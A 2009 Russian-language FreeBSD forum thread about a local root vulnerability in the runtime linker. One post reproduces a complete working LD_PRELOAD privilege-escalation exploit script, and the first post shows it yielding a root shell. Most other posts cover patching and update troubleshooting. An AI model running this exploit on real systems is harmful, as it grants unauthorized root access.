Критическая локальная уязвимость 7.1 7.2 8.0

Обсуждение всяких разных новостей.
Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-01 12:07:22

описание уязвимости и эксплоит сами найдете :]
патч обищают завтра, сейчас есть предварительная версия


// сейчас у себя проверил

Код: Выделить всё

se@serv4 ~ >./w00t.sh 
1 1.sh 1.sh~ PKI back bg bgbilling bgbilling20091007.sql bgbilling20091007.tar cc20090325.tgz config.sh dd dev distr env.sh env.sh~ fire-otrad.sh fuuuuck hizelhome.tar.gz js.txt json.tar.gz logo-basic.png logo1.png logo2.png logo3.png logo4.png mibs nagios nagios2cfg-2009-04-20.tar.gz nofire.pl pgsql ports-supfile postgres20090403.tgz postgresql.conf primorsk2.tar.bz2 rad2 src stable-supfile tmp traf20090923.sql traf20091119.sql traf20091130.sql.xz w00t.sh xmlrpc FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# uanem -a
uanem: not found
# uname -a
FreeBSD serv4 7.2-RELEASE-p3 FreeBSD 7.2-RELEASE-p3 #0: Tue Sep  1 11:58:53 MSD 2009     root@serv4:/usr/obj/usr/src/sys/SERV472  i386
# id
uid=1001(se) gid=1001(se) euid=0(root) groups=1001(se),0(wheel)
// истерю и бегаю кругами
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
Morty
ст. лейтенант
Сообщения: 1370
Зарегистрирован: 2007-07-17 23:25:12

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение Morty » 2009-12-01 12:08:43

подтверждаю
проверено на 8ой версии - уязвимо

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение manefesto » 2009-12-01 12:22:05

а в чем уязвимость то ?
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
Morty
ст. лейтенант
Сообщения: 1370
Зарегистрирован: 2007-07-17 23:25:12

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение Morty » 2009-12-01 12:24:49

manefesto писал(а):а в чем уязвимость то ?
пользователь может "стать рутом"

Аватара пользователя
aks
мл. сержант
Сообщения: 141
Зарегистрирован: 2008-06-03 9:29:09
Откуда: Россия Нижегородская обл. Дзержинск

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение aks » 2009-12-01 12:28:51

Тока что, тоже хотел написать новость.
Печально, печально :(

Аватара пользователя
terminus
майор
Сообщения: 2305
Зарегистрирован: 2007-10-29 11:27:35
Откуда: Рига

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение terminus » 2009-12-01 12:41:54

Не помог, значит, ProPolice на 8.0 ? :unknown:
Модель: AST-PM-105/0044; Тип: Универсальный, ремонтный; Название: Терминус; Род повреждения: Распад функций; Выводы: Сдать на слом.

_Andy
проходил мимо

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение _Andy » 2009-12-01 12:47:10

http://www.exploit-db.com/exploits/10255

Код: Выделить всё

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
       extern char **environ;
       environ = (char**)malloc(8096);

       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

       execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
       extern char **environ;
       environ=NULL;
       system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Аватара пользователя
ProFTP
подполковник
Сообщения: 3388
Зарегистрирован: 2008-04-13 1:50:04
Откуда: %&й
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение ProFTP » 2009-12-01 13:01:00

разыменовали указатель?
Pеrl FAQ
perl -e 'print join"",map $$_[rand@$_],([0..9,'a'..'z','A'..'Z'])x30'
ИзображениеИзображение

Аватара пользователя
angelas_
сержант
Сообщения: 212
Зарегистрирован: 2009-08-26 13:04:09
Откуда: Oslo, Norway
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение angelas_ » 2009-12-01 13:47:23

Ну похоже в 8 и 7 уже поправили:
http://docs.freebsd.org/cgi/getmsg.cgi? ... c-stable-8
http://docs.freebsd.org/cgi/getmsg.cgi? ... c-stable-7
А вот насчёт 6 пока неясно...
:smile:
Тэстэд ин экстримс!

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-01 14:09:11

на шиштерке не работает говорят

да сейчас проверил - не работает на 6.4-RELEASE-p7
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение Alex Keda » 2009-12-01 14:09:54

Код: Выделить всё

darksun# cd /tmp/
darksun# fetch http://people.freebsd.org/~cperciva/rtld.patch
rtld.patch                                    100% of  846  B 1971 kBps
darksun# cd /usr/src/
darksun# find . -name rtld.c
./libexec/rtld-elf/rtld.c
^C
darksun# cd ./libexec/rtld-elf/
darksun# patch -p0 < /tmp/rtld.patch
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c     (revision 199977)
|+++ rtld.c     (working copy)
--------------------------
Patching file rtld.c using Plan A...
Hunk #1 succeeded at 361 (offset -5 lines).
done
darksun# make && make install
больше не прокатывает
Убей их всех! Бог потом рассортирует...

gilas
мл. сержант
Сообщения: 85
Зарегистрирован: 2009-02-16 18:48:58

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение gilas » 2009-12-02 13:14:59

Код: Выделить всё

 cd /usr/src/libexec/rtld-elf
# patch -p0 < /tmp/rtld.patch
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c     (revision 199977)
|+++ rtld.c     (working copy)
--------------------------
Patching file rtld.c using Plan A...
Hunk #1 failed at 366.
1 out of 1 hunks failed--saving rejects to rtld.c.rej
done
#
либо не выспался, либо одно из двух (с). в чем я тут ошибся?

Код: Выделить всё

FreeBSD tmm.test.ru 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #1: Wed Dec  2 09:23:25 MSK 2009     root@tmm.test.ru:/usr/src/sys/i386/compile/kern.10-11-2009  i386

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение Alex Keda » 2009-12-02 13:27:48

ручками тогда.
там немного.
Убей их всех! Бог потом рассортирует...

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-03 13:41:47

хм, http://docs.freebsd.org/cgi/getmsg.cgi? ... d-security
в 7.2-p5 поправят, я вот думаю может на -STABLE прыгнуть, но что-то много изменений :-\
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение manefesto » 2009-12-03 13:43:21

дядя, а я в стабле
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
angelas_
сержант
Сообщения: 212
Зарегистрирован: 2009-08-26 13:04:09
Откуда: Oslo, Norway
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение angelas_ » 2009-12-03 13:44:23

Всю жизнь на серверах только -STABLE, eщё со времён 2.2.5
:smile:
Тэстэд ин экстримс!

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-03 13:53:19

не ну вас, не собираюсь я бегать до серверов, погодю патчсета
шаредхостингом всеравно не балуюсь ;)
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.


Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-03 14:02:45

вот, теперь будем обновлятся
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение schizoid » 2009-12-04 13:26:50

старнно, на одном серваке пришли обновления, на втором нет. в чем прикол?

Код: Выделить всё

[root@gate.brain.lan /usr/home/eugene]# freebsd-update fetch
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 7.1-RELEASE from update4.FreeBSD.org... done.
Fetching metadata index... done.
Fetching 2 metadata patches.. done.
Applying metadata patches... done.
Inspecting system... done.
Preparing to download files... done.
Fetching 13 patches.....10. done.
Applying patches... done.

The following files will be updated as part of updating to 7.1-RELEASE-p9:
/etc/mtree/BSD.var.dist
/libexec/ld-elf.so.1
/usr/lib/libssl.a
/usr/lib/libssl.so.5
/usr/lib/libssl_p.a
/usr/sbin/freebsd-update
/usr/src/crypto/openssl/ssl/s3_lib.c
/usr/src/crypto/openssl/ssl/s3_pkt.c
/usr/src/crypto/openssl/ssl/s3_srvr.c
/usr/src/etc/mtree/BSD.var.dist
/usr/src/libexec/rtld-elf/rtld.c
/usr/src/sys/conf/newvers.sh
/usr/src/usr.sbin/freebsd-update/freebsd-update.sh
/var/db/freebsd-update
[root@gate.brain.lan /usr/home/eugene]# freebsd-update install
Installing updates... done.
[root@gate.brain.lan /usr/home/eugene]# uname -a
FreeBSD gate.brain.lan 7.1-RELEASE-p8 FreeBSD 7.1-RELEASE-p8 #1: Mon Oct 19 18:10:55 EEST 2009     eugene@gate.brain.lan:/usr/obj/usr/src/sys/GENERIC  i386

Код: Выделить всё

[root@web.brain.lan /usr/home/eugene]# freebsd-update fetch
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 7.1-RELEASE from update5.FreeBSD.org... done.
Fetching metadata index... done.
Inspecting system... done.
Preparing to download files... done.

No updates needed to update system to 7.1-RELEASE-p8.
[root@web.brain.lan /usr/home/eugene]# freebsd-update install^C
[root@web.brain.lan /usr/home/eugene]# uname -a
FreeBSD web.brain.lan 7.1-RELEASE-p8 FreeBSD 7.1-RELEASE-p8 #0: Fri Oct  2 07:10:41 UTC 2009     root@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
вроде как версии одинаковые...
ядерный взрыв...смертельно красиво...жаль, что не вечно...

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение schizoid » 2009-12-04 13:32:14

ха, прикол!

Код: Выделить всё

# freebsd-update fetch -s update4.FreeBSD.org
Looking up update4.FreeBSD.org mirrors... none found.
Fetching metadata signature for 7.1-RELEASE from update4.FreeBSD.org... done.
Fetching metadata index... done.
Fetching 2 metadata patches.. done.
Applying metadata patches... done.
Inspecting system... done.
Preparing to download files... done.
Fetching 13 patches.....10. done.
Applying patches... done.

The following files will be updated as part of updating to 7.1-RELEASE-p9:
/etc/mtree/BSD.var.dist
/libexec/ld-elf.so.1
/usr/lib/libssl.a
/usr/lib/libssl.so.5
/usr/lib/libssl_p.a
/usr/sbin/freebsd-update
/usr/src/crypto/openssl/ssl/s3_lib.c
/usr/src/crypto/openssl/ssl/s3_pkt.c
/usr/src/crypto/openssl/ssl/s3_srvr.c
/usr/src/etc/mtree/BSD.var.dist
/usr/src/libexec/rtld-elf/rtld.c
/usr/src/sys/conf/newvers.sh
/usr/src/usr.sbin/freebsd-update/freebsd-update.sh
/var/db/freebsd-update
т.е. не на всех зеркалах есть обновления...
ядерный взрыв...смертельно красиво...жаль, что не вечно...

Аватара пользователя
thefree
лейтенант
Сообщения: 980
Зарегистрирован: 2008-12-29 9:23:19
Откуда: Весёлая Страна

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение thefree » 2009-12-04 13:36:16

они вообще гады, в рассылки написано будет 8.0-RELEASE-p1 а на дели после обдейта

Код: Выделить всё

FreeBSD pandora 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009     root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
Не судите меня строго, Я не волшебник, а только учусь!
http://planetbsd.ru - RSS-агрегатор *BSD по Рунету

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-04 13:50:28

у меня рабочая версия такая: так как ядро не менялось, то uname такой остается :pardon:
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение princeps » 2009-12-04 15:26:20

schizoid писал(а):т.е. не на всех зеркалах есть обновления...
Вчера полдня убил, два раза на одном сервере систему пересобрали, пока поняли, в чём дело :)
Вообще что-то в этот раз странное творится. С одного из серверов - не могу посмотреть с какого именно, т.к. сервер в дауне сейчас - скачались какие-то кривые исходники 7.2. Дважды пересобирали фрю, каждый раз она не грузилась, на какой-то косяк в ядре ругалась.
Ещё на одном сервере была такая ситуация - в UPDATING было белым по чёрному написано про p5, но после пересборки видел всё ту же p4 и эксплойт работал. Через полдня обновили исходники, пересобрали ещё раз, всё стало нормально.
Оказывается, и такое тоже бывает :( Может, карма плохая?
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Критическая локальная уязвимость 7.1 7.2 8.0

Непрочитанное сообщение hizel » 2009-12-04 16:12:51

princeps писал(а): Оказывается, и такое тоже бывает :( Может, карма плохая?
нет, просто невнимательность :]
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.